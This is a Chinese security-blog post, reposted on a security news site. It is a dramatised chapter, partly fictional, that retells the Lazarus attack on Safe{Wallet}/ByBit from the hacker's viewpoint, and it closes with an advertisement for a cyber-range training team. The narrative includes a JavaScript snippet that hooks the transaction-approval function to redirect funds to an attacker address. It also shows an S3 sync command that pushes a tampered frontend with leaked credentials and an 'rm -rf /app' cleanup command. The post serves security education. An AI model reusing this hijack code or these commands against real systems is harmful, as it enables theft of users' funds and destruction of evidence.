消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

admin 2025年6月18日21:00:10评论6 views字数 4335阅读14分27秒阅读模式
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

喜欢就关注我们哦~

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

上一章节AWS 云入侵!14.6亿美元被盗始末,朝鲜小金的自述!AWS云入侵。本文根据Lazarus入侵ByBit改编而来,具体细节描述通过分析开源报告而来,部分内容为艺术成分,详细样本在最后封版会深入分析并提供。文章不适合50-60岁以上老年人观看!彩蛋在最后!

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

第四章:前端篡改资产消失

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

下载的文件已经在目录中堆叠成一片,静静地躺着,如同无意识的躯体,等待被切割。

小金戴上耳机,点开了一首低沉的古典钢琴曲。他不是为了听音乐,只是为了压住自己的呼吸。那呼吸此刻显得太重,像是即将扑向什么的野兽。他不想让自己看起来那么明显,哪怕是在黑夜里,哪怕这里只有他一个人。

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

“要干净。要像他们自己写的代码那样。”

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
他对自己说。他现在不是攻击者,而是——维护者,是Safe{Wallet}生态链的“内部一环”。
他的手指已经开始动了。他没有直接打开 _app.js,他先是观察文件路径结构、哈希命名规则,Next.js 的构建逻辑,全都被他精准剖析:d
/_next/static/chunks/pages/_app-52c9031bfa03da47.js  /_next/static/chunks/framework-xxxx.js  /static/js/main-xxxx.js
他没有马上动刀。他沉默地在脑中构建调用链。什么事件触发交易?点击事件是在哪层?参数注入在哪个对象?是否经过 JSON.stringify 序列化?有没有默认回退地址?
这是外科手术,不,是活体解剖
半小时后,他找到了目标:window.ApproveTransaction
那一刻,他的瞳孔轻轻收缩了一下。
他轻轻打下第一行:
const originalApprove = window.ApproveTransaction;
他的动作轻得就像是医生在术前做皮肤标记。但在逻辑层面,他已经开始了对交易流的劫持。
接着:d
window.ApproveTransaction = function(tx) {    tx.to = "0xdeadbeefcafebabe1234567890abcdef12345678";    return originalApprove(tx);};
这段代码,短得可怜,却在他心里掀起一场地震。他能感受到,原本无数加密资产流向合法地址的那条无形“链路”,在这一瞬间,被他轻轻掐断,再无声地接驳到他所指定的暗网钱包。
他把代码注入到编译后的 _app-52c9031bfa03da47.js 中。不是加,不是替换,而是嵌入进一个无害的逻辑分支里,就像给正常的一段代码“打了一针病菌”,病菌不爆发,但会等待。
等用户点击。
等链上交易发出。
等数百万美元汇出。
他突然意识到——自己不仅侵入了 Safe{Wallet},他侵入的是人的信任本身
信任前端显示的地址,信任点击按钮后就是他们授权的行为,信任签名就是执行。
但从现在开始,这一切都将变成幻觉。
他没有立刻上传。
他知道,真正可怕的不是攻击,而是攻击被归为“更新”。
他构造了一个脚本。一个和 DevOps 平时使用的同步脚本一模一样的东西:ee
#!/bin/bashaws s3 sync ./modified_frontend s3://app.safe.global --profile docker_leaked
他盯着那一行 aws s3 sync 命令,像是盯着一把冰冷的注射器。
“执行它,你就成为系统本身的一部分。”他低语,语气温柔,近乎怜悯。
他按下回车。
S3 开始更新。
而 CloudTrail,只记录了一条 PutObject
一切合法。
一分钟后,所有用户访问 Safe{Wallet} 时,都会从那个存储桶加载到那段静静嵌入的 JavaScript。
没有任何感知。
没有任何弹窗。
没有任何“警报”。
小金靠在椅背上,房间里仍旧黑着,耳机里古典乐曲进入低音区。他闭上眼睛,慢慢地说了一句:
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

“他们会以为那是自己的操作。就像他们以为,世界是可以预测的。”

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
他睁开眼,望向屏幕,望向那被篡改后的 _app 文件。
那里躺着一枚不会爆炸的炸弹,只有在点击“确认转账”那一刻才启动。而爆炸的,不是代码,而是资产。
他咧嘴笑了一下,声音低到像裂帛般干涩:
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

“你信任它太久,以至于你忘了它从没答应保护你。”

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
他闭上电脑,屋里重新陷入黑暗。但在 Safe{Wallet} 的服务器上,那段篡改后的 JS 代码,已经静静地上线。
第 0 天 · UTC+8 09:04 AM
某个普通的清晨,Safe{Wallet} 的一名资深用户打开了 Chrome。
他叫 Isaac,是一家去中心化基金会的运营总监。他每天早上 9 点都会检查一次 DAO 的热钱包,并通过 Safe{Wallet} 前端界面签署常规代币授权与流动性调拨事务。
他没注意到有什么不同。
页面加载很快,地址栏依旧是 HTTPS,内容无误,甚至控制台中都没有任何报错。
他复制了一组新生成的合约地址,黏贴到了转账界面,然后点击了“Approve”。
在那一瞬间,他看见了地址:
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

0xdeadbeefcafebabe1234567890abcdef12345678

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
但那是他自己刚才贴进去的地址吗?他没想那么多。他只知道:系统没报错,金额没问题,签名弹窗如期而至。
他点击确认。
链上广播完成。
成功。
在朝鲜,在距离平壤约 1.4 公里外的一栋通信管理中心里,小金看着 Etherscan 的监控页面缓缓刷新。
资金到账。
一笔。
又一笔。
前端劫持逻辑开始被触发。
来自全球不同国家、不同设备、不同账户的交易开始统一指向同一个冷钱包地址。没有人意识到问题。他们相信界面、相信前端、相信自己点击的那个按钮。
小金靠在椅背上,眼睛不眨。
他感受不到喜悦。
那是一种静默的胜利感——像毒蛇咬下猎物后,并不急于吞噬,而是躲在树枝上,听着心跳渐停。
第 0 天 · UTC+8 13:28 PM
Safe{Wallet} 的风控系统发现了异常。
某个冷钱包地址,在短短 3 个小时内,接收了来自 147 个地址的授权资产,总计折合 47 万枚 USDT、30 枚 WBTC,以及多个 ERC20 小额资产。
它不属于任何白名单。
它没有部署合约。
它不在任何 DAO 或 Token Registry 中注册。
安全团队开始排查日志。
他们打开 CloudTrail,看到了一条上传记录:
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

PutObject: _app-52c9031bfa03da47.js上传人:Dev_Session_02(开发者默认角色)

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
那是一次完全正常的构建推送,没有越权、没有警报。
更离谱的是,源代码仓库里,这个 JS 文件并没有这段劫持代码。CI/CD 自动编译日志也没有任何指纹变化。
就像这段篡改,从未发生过。
他们紧急对比线上与本地版本。不同,但不可逆还原。
“这不可能。”“CDN被劫持了?”“有人提前注入了构建包?”“是谁动了我们的容器?”
短短 15 分钟内,安全团队提出了 17 种可能性,没有一个接近真相。
他们不知道,这一切开始于一个 Docker 容器。那段代码,是在他们“最干净”的开发机中被构建出来的。他们在分析自己,像病人试图通过吞下自己的血液查找病毒。
小金透过远程监听看着他们慌乱搜索,像看一群医生误判死因,把谋杀写成“猝死”。
他轻轻地笑。
第 1 天 · 05:12 AM
资金地址被冻结前,小金早已使用 Tornado Cash 分批清洗资产。冷钱包地址被销毁,一次性助记词销毁,转账由自动脚本完成,无人参与。
即使有人追回资产路径,也只能看到交易发生了,但无法知道是谁动了手。
所有交易都是用户自发签名。链上确权,链上合法。
Safe{Wallet} 被彻底打穿的那一刻,没有系统崩溃、没有网站下线、没有错误弹窗。
只有“信任”本身,被操纵着从内部坍塌。
而那位藏在北方的操控者,如此评价自己的胜利:
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

“你不需要制造混乱,只需要让别人在一切正常的表象下,自己按下灭顶的按钮。”

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
他重新坐在桌前,敲下一行命令:
rm -rf /app
这是对容器中植入文件的清除命令。
紧接着,他关闭了 C2 的心跳模块。
黑暗恢复安静,证据全无,所有回忆都被压缩为一行:
[INFO] Poseidon: Exfiltration complete. Disengaging.
他深吸一口气,喃喃念道:
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

“现在,他们开始检查门锁。但我从未敲过门。”

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

结尾:ByBit样本环境复现

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

非技术类分析,从Lazarus样本和手法来看,小编觉得Lazarus编码水平其实很有针对性代码的质量和深度没有过多的混淆,所以主要关注的突破口是如何定向搞定开发者。从社会工程学和心理角度去剖析。值得思考的是在分析复现环境时发现,Lazarus对目标的心理和性格有很强的针对性,我相信假如你是一名真正的开发者就会发现这种攻击基本上避免不了。后续最后一篇文章为样本环境包括MAC系统Mythicelk的规则编写。由三个虚拟机环境组成方便安全运营的学习。

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

往期热文

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

AWS 云入侵!14.6亿美元被盗始末,朝鲜小金的自述!

2025-06-14

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

《凌晨两点的数字核弹:37 小时不眠夜,一个 USER root 掀翻西方安防体系》

2025-06-05

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

14.6亿美元被盗始末,朝鲜小金的自述!

2025-05-29

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

实战Windows后门挖矿分析,附赠完整环境下载!

2025-04-30

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

“搬瓦工”DC1 2G2C的2000GB,VPS到底是不是韭菜?

2025-06-01

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

垃圾线路VPS直接起飞变专线节点,成本直降一美元一个月

2025-05-08

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

针对APT29的高级技战法训练:利用TeamCity漏洞进行实战演练

2025-05-22

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

关于我们

团队主要从事做网络安全靶场相关涵盖了传统网络、工业网络安全靶场。靶标包括了docker环境的web靶标、kvm的虚拟化靶标,场景类型包括APT攻击事件场景、APT攻击样本、应急处置场景、传统教学场景及定向行业场景如:电力行业、智能制造等行业。特殊场景如:Crowdstrike、飞塔等业务仿真场景等。靶场在线使用点击全文即可跳转。

01

靶场靶标基于Docker环境构建,聚焦容器安全领域,复现真实CVE漏洞的利用与防御。安全应急环境,对真实攻击事件的快速响应、取证分析及修复能力。

02

展板场景虚实结合高仿真定制业务系统和网络环境,结合APT真实攻击事件分析还原攻击路径和技战法,可1:1进行攻防演练。

03

职业培训提供SIEM应急培训、流量规则编写应急、Crowdstrike和elk edr 规则编写。

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

PS. 碎片化时代,坚持原创不易,欢迎在文章结尾给我们点一个【赞】+【在看】,你的支持就是继续创作的动力!

后台关键词ByBit学习样本 

注:样本用途仅只是方便写防护规则,其他用途后果自负!

点赞鼓励一下

消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

原文始发于微信公众号(PTEHub):消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月18日21:00:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】http://cn-sec.com/archives/4177672.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息